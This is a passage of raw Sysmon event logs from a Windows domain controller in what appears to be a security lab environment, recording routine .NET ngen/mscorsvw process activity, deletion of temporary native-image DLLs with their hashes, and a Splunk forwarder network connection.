NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023240Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.449{4DB9351A-A27B-60D3-8F05-00000000CF01}4864NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MX3HBQT85P\Microsoft.Windows.ServerManager.DhcpServer.Plugin.ni.dll.auxMD5=6740D746585298B46956BFC3506712B4,SHA256=EA875E8A12398C1A1F1315FD11D5C0EE2877A627D6C8B68B73DC848A72C64A3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023239Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.449{4DB9351A-A27B-60D3-8F05-00000000CF01}4864NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MX3HBQT85P\Microsoft.Windows.ServerManager.DhcpServer.Plugin.ni.dllMD5=470D9A27636C64E4FB047B3673B3CE2E,SHA256=75C95A950D536116C3EAA944BF4E4C1B948867B29B080725010617619E0C8D5B,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023238Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.433{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27B-60D3-8F05-00000000CF01}4864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023237Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.402{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A27B-60D3-8F05-00000000CF01}4864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023236Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.402{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27B-60D3-8F05-00000000CF01}4864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023235Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.402{4DB9351A-A27B-60D3-8E05-00000000CF01}6028NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\SJ87XTHC0G\Microsoft.Windows.ServerManager.Deployment.Extension.ni.dll.auxMD5=94B5BBF7F85889B1393DBD126F659EBC,SHA256=B8A6308B8B8BBA87751AE705C260956C5D35EC466D188B50B8377F37381F5F47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023234Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.386{4DB9351A-A27B-60D3-8E05-00000000CF01}6028NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\SJ87XTHC0G\Microsoft.Windows.ServerManager.Deployment.Extension.ni.dllMD5=62997B1A2B3351A5607BE64445B6A61F,SHA256=FA62908137DBA9BDB03B419B172A5E83C301E57451194A257D52CF36EBA3AFC4,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023233Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.371{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27B-60D3-8E05-00000000CF01}6028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023232Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.340{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A27B-60D3-8E05-00000000CF01}6028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023231Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.340{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27B-60D3-8E05-00000000CF01}6028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023230Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.324{4DB9351A-A27B-60D3-8D05-00000000CF01}5784NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\556X91RBB3\Microsoft.Windows.ServerManager.Common.ni.dll.auxMD5=5FBDE8CF2AB250F74EB15816914D6510,SHA256=271A2527F2CA472B5E85039BFBD295DBE7D9D2FF07017F387B412A244225C00F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023229Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.308{4DB9351A-A27B-60D3-8D05-00000000CF01}5784NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\556X91RBB3\Microsoft.Windows.ServerManager.Common.ni.dllMD5=BB941D5FD168076C5B0398C0C9386CF8,SHA256=2C8FDB6F59B6CCF0122163EB75F27F20A2B70C59B51F7F5FCBA75755EAE8F527,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023228Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.058{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8EDC8A55DCB2E6423AFEE5B00F41D2A,SHA256=E0CBB936EF3FF4F241ACB62CE7F2291AF533572C52EC0F2A0A475111C62C3377,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023227Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.042{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27B-60D3-8D05-00000000CF01}5784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023226Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.027{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27B-60D3-8D05-00000000CF01}5784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023225Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.027{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27B-60D3-8D05-00000000CF01}5784C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023224Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.027{4DB9351A-A27A-60D3-8C05-00000000CF01}6080NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\OA1223E9RI\Microsoft.Windows.ServerManager.BitLocker.Plugin.ni.dll.auxMD5=D57E2570474456A8F328EA83B2877B7C,SHA256=37381E8C8DB7CE01937D850B3380908D2643E262774BBF6F62948C4C847B5BEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023223Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.027{4DB9351A-A27A-60D3-8C05-00000000CF01}6080NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\OA1223E9RI\Microsoft.Windows.ServerManager.BitLocker.Plugin.ni.dllMD5=4913DDFD290B54587B4974DF0C2462F5,SHA256=1A658236BEAA244EC367F69E6C9A1D70109AD1D0B27AF230D31236143CF71DC5,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023222Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.011{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27A-60D3-8C05-00000000CF01}6080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000023334Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:07.253{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61460-false10.0.1.12-8000- 23542300x800000000000000023333Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.824{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=357B7B641D8C7D272061AC65A993F6FC,SHA256=892B5208C949CE48EF35F4D1E75DB07ECB1718112ED0E1A7FA3DD53999A25183,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023332Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.777{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27C-60D3-A105-00000000CF01}6528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023331Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.761{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27C-60D3-A105-00000000CF01}6528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023330Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.761{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27C-60D3-A105-00000000CF01}6528C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023329Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.761{4DB9351A-A27C-60D3-A005-00000000CF01}4372NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6VBG239JFQ\Microsoft.WSMan.Runtime.ni.dll.auxMD5=E9EE8C73ECF3C42CF9088B4D778E2F42,SHA256=2EA8C00DC6EBBAC27865E316EC060E431CF71A316D6DD3B4234667007B50454F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023328Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.761{4DB9351A-A27C-60D3-A005-00000000CF01}4372NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6VBG239JFQ\Microsoft.WSMan.Runtime.ni.dllMD5=88D6C5154B9234917119A449BB9A4B04,SHA256=E5A680B12F8D0E6E9C2A7C3507D63AB5F6DD769020B1BC204204AD682E4967A2,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023327Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.746{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27C-60D3-A005-00000000CF01}4372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023326Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.714{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A27C-60D3-A005-00000000CF01}4372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023325Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.714{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27C-60D3-A005-00000000CF01}4372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023324Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.714{4DB9351A-A27C-60D3-9F05-00000000CF01}6732NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6WXIZJXUTS\Microsoft.WSMan.Management.Activities.ni.dll.auxMD5=8E31D02C46A8468EBD89FDCCA03864BB,SHA256=DA3B5D659C22D4B8153FE55C84C48F3C7165CA751F60B1007814351642DF3B30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023323Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:08.714{4DB9351A-A27C-60D3-9F05-00000000CF01}6732NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\6WXIZJXUTS\Microsoft.WSMan.Management.Activities.ni.dllMD5=E133E918A5D0FBC6789A79269C36FA9B,SHA256=CC25C471B277A071A8B2EE9502469972203816ADCCA330306F2D491B2A444279,IMPHASH=00000000000000000000000000000000truetrue 